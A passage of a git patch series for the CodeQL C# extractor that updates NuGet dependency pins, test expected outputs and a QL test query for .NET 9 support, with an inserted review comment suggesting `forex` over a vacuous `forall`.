"net48": [], "net5.0": ["System.Runtime", "System.Runtime.Handles"], "net6.0": ["System.Runtime", "System.Runtime.Handles"], "net7.0": ["System.Runtime", "System.Runtime.Handles"], "net8.0": ["System.Runtime", "System.Runtime.Handles"], "net9.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp1.1": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.1": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp2.2": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.0": ["System.Runtime", "System.Runtime.Handles"], "netcoreapp3.1": ["System.Runtime", "System.Runtime.Handles"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.4": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.5": ["System.Runtime", "System.Runtime.Handles"], "netstandard1.6": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.0": ["System.Runtime", "System.Runtime.Handles"], "netstandard2.1": ["System.Runtime", "System.Runtime.Handles"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit", "id": "xunit", "version": "2.9.2", "sha512": "sha512-bs4ccplaqCT7+jdAJhtt75uKq9qA3Jeld1ugiOgGEGSnzq8gkoa0VUqNEKkMPkBwV5COlAllNJGtGBfgxoZDrA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net20": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net30": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net35": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net40": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net403": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net45": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net451": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net452": ["xunit.core", 
"xunit.assert", "xunit.analyzers"], "net46": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net461": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net462": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net47": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net471": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net472": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net48": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net5.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net6.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net7.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net8.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "net9.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp2.2": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netcoreapp3.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.1": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.2": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.3": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.4": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.5": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard1.6": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.0": ["xunit.core", "xunit.assert", "xunit.analyzers"], "netstandard2.1": ["xunit.core", "xunit.assert", "xunit.analyzers"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": 
"xunit.abstractions", "id": "xunit.abstractions", "version": "2.0.3", "sha512": "sha512-PKJri5f0qEQPFvgY6CZR9XG8JROlWSdC/ZYLkkDQuID++Egn+yWjB+Yf57AZ8U6GRlP7z33uDQ4/r5BZPer2JA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "xunit.analyzers", "id": "xunit.analyzers", "version": "1.16.0", "sha512": "sha512-65QLxnRoOqpAn2hMnjI1FLmQEjzUye2h4MwRVe1k151K+UFG1Ehr/s/MLwNJ6pCNoyoJjOoNuF7OGW4mH2bdaQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "xunit.analyzers", "id": "xunit.analyzers", "version": "1.17.0", "sha512": 
"sha512-36BC2a5gEL5TDXjkzhD8dK4toNcPGdwFb4tbIODwTp4eXhRS6BURiTclfZD2vFNTq4obCzPOdwnayhppP4qtUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.assert", "id": "xunit.assert", "version": "2.9.2", "sha512": "sha512-huNfINLH5HnyiPImimKv7liIJJ2MgRdJYT7ky3464zR62SH7o9JjsgMiSZRXha46kgTCNjKSNN1VvctC+USp7w==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.core", "id": "xunit.core", "version": "2.9.2", "sha512": "sha512-kW48d7YL7ryT4zuWTjJN491cJwY8aYiIAxDaXJRebgMIw40PmlREiiaIz33QUFmglcfLlaoRyZcI4sl70kARiw==", 
"sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net20": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net30": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net35": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net40": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net403": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net45": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net451": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net452": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net46": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net461": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net462": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net47": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net471": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net472": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net48": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net5.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net6.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net7.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net8.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "net9.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp1.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp1.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp2.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp2.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp2.2": ["xunit.extensibility.core", "xunit.extensibility.execution"], 
"netcoreapp3.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netcoreapp3.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.1": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.2": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.3": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.4": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.5": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard1.6": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard2.0": ["xunit.extensibility.core", "xunit.extensibility.execution"], "netstandard2.1": ["xunit.extensibility.core", "xunit.extensibility.execution"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "xunit.extensibility.core", "id": "xunit.extensibility.core", "version": "2.9.2", "sha512": "sha512-sosk+dg5Cn4N9MKOjQ1wFTvfgduqiX1DLRZHEYXIaLOuTJbCJeXfn7XhAVDGY+zeB8aX3jCKL8BcDp4EJCdZXw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": ["xunit.abstractions"], "net451": ["xunit.abstractions"], "net452": ["xunit.abstractions"], "net46": ["xunit.abstractions"], "net461": ["xunit.abstractions"], "net462": ["xunit.abstractions"], "net47": ["xunit.abstractions"], "net471": ["xunit.abstractions"], "net472": ["xunit.abstractions"], "net48": ["xunit.abstractions"], "net5.0": ["xunit.abstractions"], "net6.0": ["xunit.abstractions"], "net7.0": ["xunit.abstractions"], "net8.0": ["xunit.abstractions"], "net9.0": ["xunit.abstractions"], "netcoreapp1.0": ["xunit.abstractions"], "netcoreapp1.1": ["xunit.abstractions"], "netcoreapp2.0": ["xunit.abstractions"], 
"netcoreapp2.1": ["xunit.abstractions"], "netcoreapp2.2": ["xunit.abstractions"], "netcoreapp3.0": ["xunit.abstractions"], "netcoreapp3.1": ["xunit.abstractions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": ["xunit.abstractions"], "netstandard1.2": ["xunit.abstractions"], "netstandard1.3": ["xunit.abstractions"], "netstandard1.4": ["xunit.abstractions"], "netstandard1.5": ["xunit.abstractions"], "netstandard1.6": ["xunit.abstractions"], "netstandard2.0": ["xunit.abstractions"], "netstandard2.1": ["xunit.abstractions"]}, "targeting_pack_overrides": [], "framework_list": []}, From 6a0d56a1464f349c78044ac12953bdb720044854 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 15:45:10 +0100 Subject: [PATCH 0875/1267] C#: Update DataQuality output. Roslyn now correctly finds the compile time target. --- .../Telemetry/DatabaseQuality/IsNotOkayCall.expected | 1 - .../query-tests/Telemetry/DatabaseQuality/NoTarget.expected | 1 - csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs | 2 +- 3 files changed, 1 insertion(+), 3 deletions(-) diff --git a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected index 205022b7180..7555a37394b 100644 --- a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected +++ b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/IsNotOkayCall.expected 
@@ -1,4 +1,3 @@ | Quality.cs:26:19:26:26 | access to indexer | Call without target $@. | Quality.cs:26:19:26:26 | access to indexer | access to indexer | | Quality.cs:29:21:29:27 | access to indexer | Call without target $@. | Quality.cs:29:21:29:27 | access to indexer | access to indexer | | Quality.cs:32:9:32:21 | access to indexer | Call without target $@. | Quality.cs:32:9:32:21 | access to indexer | access to indexer | -| Quality.cs:34:21:34:25 | object creation of type null | Call without target $@. | Quality.cs:34:21:34:25 | object creation of type null | object creation of type null | diff --git a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected index 84b6994e033..7ae469cf84e 100644 --- a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected +++ b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/NoTarget.expected @@ -10,6 +10,5 @@ | Quality.cs:26:19:26:26 | access to indexer | Call without target $@. | Quality.cs:26:19:26:26 | access to indexer | access to indexer | | Quality.cs:29:21:29:27 | access to indexer | Call without target $@. | Quality.cs:29:21:29:27 | access to indexer | access to indexer | | Quality.cs:32:9:32:21 | access to indexer | Call without target $@. | Quality.cs:32:9:32:21 | access to indexer | access to indexer | -| Quality.cs:34:21:34:25 | object creation of type null | Call without target $@. | Quality.cs:34:21:34:25 | object creation of type null | object creation of type null | | Quality.cs:38:16:38:26 | access to property MyProperty2 | Call without target $@. | Quality.cs:38:16:38:26 | access to property MyProperty2 | access to property MyProperty2 | | Quality.cs:50:20:50:26 | object creation of type T | Call without target $@. | Quality.cs:50:20:50:26 | object creation of type T | object creation of type T | 
diff --git a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs index c3ec759d687..31f4deda5df 100644 --- a/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs +++ b/csharp/ql/test/query-tests/Telemetry/DatabaseQuality/Quality.cs @@ -31,7 +31,7 @@ public class Test Span guidBytes = stackalloc byte[16]; guidBytes[08] = 1; // TODO: this indexer call has no target, because the target is a `ref` returning getter. - new MyList([new(), new Test()]); // TODO: the `new()` call has no target, which is unexpected, as we know at compile time, that this is a `new Test()` call. + new MyList([new(), new Test()]); } public int MyProperty1 { get; } From 61fa889190e89ab423fd8fa5185d8f360f9d0ada Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 16:04:15 +0100 Subject: [PATCH 0876/1267] C#: Update the format test expected output as the params keyword is now extracted correctly. --- .../format/StringFormatItemParameter.expected | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected b/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected index 978e1340492..53106dd756e 100644 --- a/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected +++ b/csharp/ql/test/library-tests/frameworks/format/StringFormatItemParameter.expected @@ -1,4 +1,3 @@ -| Console | Write(string, ReadOnlySpan) | arg | | Console | Write(string, object) | arg0 | | Console | Write(string, object, object) | arg0 | | Console | Write(string, object, object) | arg1 | 
@@ -6,7 +5,7 @@ | Console | Write(string, object, object, object) | arg1 | | Console | Write(string, object, object, object) | arg2 | | Console | Write(string, params Object[]) | arg | -| Console | WriteLine(string, ReadOnlySpan) | arg | +| Console | Write(string, params ReadOnlySpan) | arg | | Console | WriteLine(string, object) | arg0 | | Console | WriteLine(string, object, object) | arg0 | | Console | WriteLine(string, object, object) | arg1 | @@ -14,10 +13,10 @@ | Console | WriteLine(string, object, object, object) | arg1 | | Console | WriteLine(string, object, object, object) | arg2 | | Console | WriteLine(string, params Object[]) | arg | +| Console | WriteLine(string, params ReadOnlySpan) | arg | | Debug | Assert(bool, string, string, params Object[]) | args | | Debug | Print(string, params Object[]) | args | | Debug | WriteLine(string, params Object[]) | args | -| StringBuilder | AppendFormat(IFormatProvider, string, ReadOnlySpan) | args | | StringBuilder | AppendFormat(IFormatProvider, string, object) | arg0 | | StringBuilder | AppendFormat(IFormatProvider, string, object, object) | arg0 | | StringBuilder | AppendFormat(IFormatProvider, string, object, object) | arg1 | @@ -25,7 +24,7 @@ | StringBuilder | AppendFormat(IFormatProvider, string, object, object, object) | arg1 | | StringBuilder | AppendFormat(IFormatProvider, string, object, object, object) | arg2 | | StringBuilder | AppendFormat(IFormatProvider, string, params Object[]) | args | -| StringBuilder | AppendFormat(string, ReadOnlySpan) | args | +| StringBuilder | AppendFormat(IFormatProvider, string, params ReadOnlySpan) | args | | StringBuilder | AppendFormat(string, object) | arg0 | | StringBuilder | AppendFormat(string, object, object) | arg0 | | StringBuilder | AppendFormat(string, object, object) | arg1 | 
@@ -33,8 +32,8 @@ | StringBuilder | AppendFormat(string, object, object, object) | arg1 | | StringBuilder | AppendFormat(string, object, object, object) | arg2 | | StringBuilder | AppendFormat(string, params Object[]) | args | +| StringBuilder | AppendFormat(string, params ReadOnlySpan) | args | | Strings | MyStringFormat(string, params Object[]) | args | -| TextWriter | Write(string, ReadOnlySpan) | arg | | TextWriter | Write(string, object) | arg0 | | TextWriter | Write(string, object, object) | arg0 | | TextWriter | Write(string, object, object) | arg1 | @@ -42,7 +41,7 @@ | TextWriter | Write(string, object, object, object) | arg1 | | TextWriter | Write(string, object, object, object) | arg2 | | TextWriter | Write(string, params Object[]) | arg | -| TextWriter | WriteLine(string, ReadOnlySpan) | arg | +| TextWriter | Write(string, params ReadOnlySpan) | arg | | TextWriter | WriteLine(string, object) | arg0 | | TextWriter | WriteLine(string, object, object) | arg0 | | TextWriter | WriteLine(string, object, object) | arg1 | @@ -50,7 +49,7 @@ | TextWriter | WriteLine(string, object, object, object) | arg1 | | TextWriter | WriteLine(string, object, object, object) | arg2 | | TextWriter | WriteLine(string, params Object[]) | arg | -| string | Format(IFormatProvider, string, ReadOnlySpan) | args | +| TextWriter | WriteLine(string, params ReadOnlySpan) | arg | | string | Format(IFormatProvider, string, object) | arg0 | | string | Format(IFormatProvider, string, object, object) | arg0 | | string | Format(IFormatProvider, string, object, object) | arg1 | 
@@ -58,7 +57,7 @@ | string | Format(IFormatProvider, string, object, object, object) | arg1 | | string | Format(IFormatProvider, string, object, object, object) | arg2 | | string | Format(IFormatProvider, string, params Object[]) | args | -| string | Format(string, ReadOnlySpan) | args | +| string | Format(IFormatProvider, string, params ReadOnlySpan) | args | | string | Format(string, object) | arg0 | | string | Format(string, object, object) | arg0 | | string | Format(string, object, object) | arg1 | @@ -66,3 +65,4 @@ | string | Format(string, object, object, object) | arg1 | | string | Format(string, object, object, object) | arg2 | | string | Format(string, params Object[]) | args | +| string | Format(string, params ReadOnlySpan) | args | From f94aaee53cc768cd3910da2aee461a9a7a6f1400 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 16:11:46 +0100 Subject: [PATCH 0877/1267] C#: Update integration tests expected output. --- .../Assemblies.expected | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected b/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected index 18cbc068ace..a706f914cd9 100644 --- a/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected +++ b/csharp/ql/integration-tests/posix/standalone_dependencies_executing_runtime/Assemblies.expected @@ -2,6 +2,7 @@ | [...]/csharp/tools/[...]/Humanizer.dll | | [...]/csharp/tools/[...]/MessagePack.Annotations.dll | | [...]/csharp/tools/[...]/MessagePack.dll | +| [...]/csharp/tools/[...]/Microsoft.Bcl.AsyncInterfaces.dll | | [...]/csharp/tools/[...]/Microsoft.Build.Framework.dll | | [...]/csharp/tools/[...]/Microsoft.Build.Utilities.Core.dll | | [...]/csharp/tools/[...]/Microsoft.Build.dll | 
@@ -18,7 +19,6 @@ | [...]/csharp/tools/[...]/Microsoft.VisualBasic.dll | | [...]/csharp/tools/[...]/Microsoft.Win32.Primitives.dll | | [...]/csharp/tools/[...]/Microsoft.Win32.Registry.dll | -| [...]/csharp/tools/[...]/Microsoft.Win32.SystemEvents.dll | | [...]/csharp/tools/[...]/Mono.Posix.NETStandard.dll | | [...]/csharp/tools/[...]/Newtonsoft.Json.dll | | [...]/csharp/tools/[...]/StructuredLogger.dll | @@ -58,7 +58,6 @@ | [...]/csharp/tools/[...]/System.Diagnostics.Tools.dll | | [...]/csharp/tools/[...]/System.Diagnostics.TraceSource.dll | | [...]/csharp/tools/[...]/System.Diagnostics.Tracing.dll | -| [...]/csharp/tools/[...]/System.Drawing.Common.dll | | [...]/csharp/tools/[...]/System.Drawing.Primitives.dll | | [...]/csharp/tools/[...]/System.Drawing.dll | | [...]/csharp/tools/[...]/System.Dynamic.Runtime.dll | @@ -155,7 +154,6 @@ | [...]/csharp/tools/[...]/System.Security.Cryptography.ProtectedData.dll | | [...]/csharp/tools/[...]/System.Security.Cryptography.X509Certificates.dll | | [...]/csharp/tools/[...]/System.Security.Cryptography.dll | -| [...]/csharp/tools/[...]/System.Security.Permissions.dll | | [...]/csharp/tools/[...]/System.Security.Principal.Windows.dll | | [...]/csharp/tools/[...]/System.Security.Principal.dll | | [...]/csharp/tools/[...]/System.Security.SecureString.dll | @@ -183,7 +181,6 @@ | [...]/csharp/tools/[...]/System.ValueTuple.dll | | [...]/csharp/tools/[...]/System.Web.HttpUtility.dll | | [...]/csharp/tools/[...]/System.Web.dll | -| [...]/csharp/tools/[...]/System.Windows.Extensions.dll | | [...]/csharp/tools/[...]/System.Windows.dll | | [...]/csharp/tools/[...]/System.Xml.Linq.dll | | [...]/csharp/tools/[...]/System.Xml.ReaderWriter.dll | From d83f2215f63cf473c8fe0c2dbbfb85afa97a0574 Mon Sep 17 00:00:00 2001 
From: Michael Nebel Date: Wed, 4 Dec 2024 16:29:33 +0100 Subject: [PATCH 0878/1267] C#: Update Parameters test to only inspect parameters from source code. --- csharp/ql/test/library-tests/methods/Parameters4.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/ql/test/library-tests/methods/Parameters4.ql b/csharp/ql/test/library-tests/methods/Parameters4.ql index aa103547f86..832f6c1ea37 100644 --- a/csharp/ql/test/library-tests/methods/Parameters4.ql +++ b/csharp/ql/test/library-tests/methods/Parameters4.ql @@ -4,5 +4,5 @@ import csharp -where forall(Parameter p | p.isParams() | p.getType() instanceof ArrayType) +where forall(Parameter p | p.isParams() and p.fromSource() | p.getType() instanceof ArrayType) select 1 From b9253222a64867d7336cd3a58411e28e1c2eab39 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 16:42:23 +0100 Subject: [PATCH 0879/1267] C#: Add change-note. --- csharp/ql/lib/change-notes/2024-12-04-dotnet9.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2024-12-04-dotnet9.md diff --git a/csharp/ql/lib/change-notes/2024-12-04-dotnet9.md b/csharp/ql/lib/change-notes/2024-12-04-dotnet9.md new file mode 100644 index 00000000000..e166040e155 --- /dev/null +++ b/csharp/ql/lib/change-notes/2024-12-04-dotnet9.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The C# extractor now supports *basic* extraction of .NET 9 projects. There might be limited support for extraction of code using the new C# 13 language features. From af2234453bef919b66c604aa45d2a419b21402e0 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 6 Dec 2024 09:10:55 +0100 Subject: [PATCH 0880/1267] C#: Update dependencies (binlog package needs to be updated). --- csharp/paket.lock | 12 +++++++----- csharp/paket.main.bzl | 7 ++++--- 2 files changed, 11 insertions(+), 8 deletions(-) diff --git a/csharp/paket.lock b/csharp/paket.lock index 8bfc5b1650e..1d8e48895b3 100644 --- a/csharp/paket.lock 
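Review bot: In Parameters4.ql the added `p.fromSource()` conjunct makes the `forall` range depend entirely on the test's own source files, and a `forall` over an empty range holds vacuously, so the query would still `select 1` if those sources stopped declaring a `params` parameter (whether they do is not visible in this hunk). Using `forex` keeps the assertion from passing on an empty range: `where forex(Parameter p | p.isParams() and p.fromSource() | p.getType() instanceof ArrayType)`. The restriction also takes library `params ReadOnlySpan` overloads, which the StringFormatItemParameter.expected change in this series now lists, out of the check. The query's header comment lies above the hunk, so it presumably needs to say the check covers source parameters only.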
+++ b/csharp/paket.lock @@ -3,7 +3,7 @@ STRATEGY: MAX RESTRICTION: == net9.0 NUGET remote: https://api.nuget.org/v3/index.json - Basic.CompilerLog.Util (0.9.3) + Basic.CompilerLog.Util (0.9.4) MessagePack (>= 2.5.187) Microsoft.CodeAnalysis (>= 4.11) Microsoft.CodeAnalysis.CSharp (>= 4.11) @@ -12,10 +12,12 @@ NUGET MSBuild.StructuredLogger (>= 2.2.243) System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (2.5.192) - MessagePack.Annotations (>= 2.5.192) - Microsoft.NET.StringTools (>= 17.6.3) - MessagePack.Annotations (2.5.192) + MessagePack (3.0.3) + MessagePack.Annotations (>= 3.0.3) + MessagePackAnalyzer (>= 3.0.3) + Microsoft.NET.StringTools (>= 17.11.4) + MessagePack.Annotations (3.0.3) + MessagePackAnalyzer (3.0.3) Microsoft.Bcl.AsyncInterfaces (9.0) Microsoft.Build (17.12.6) Microsoft.Build.Framework (>= 17.12.6) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index fa79062ab44..4887b7c333f 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl 
@@ -7,10 +7,11 @@ def main(): nuget_repo( name = "paket.main", packages = [ - {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.9.3", "sha512": "sha512-hgu/4KttHz9bXOISmomz1uO4WidkXqBbSu4MjVgj3SeJ/bH4t+nkZ5qybpqpZJHf04hdXlyt/ux0OWv5/xEKRQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool", "System.Buffers"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", 
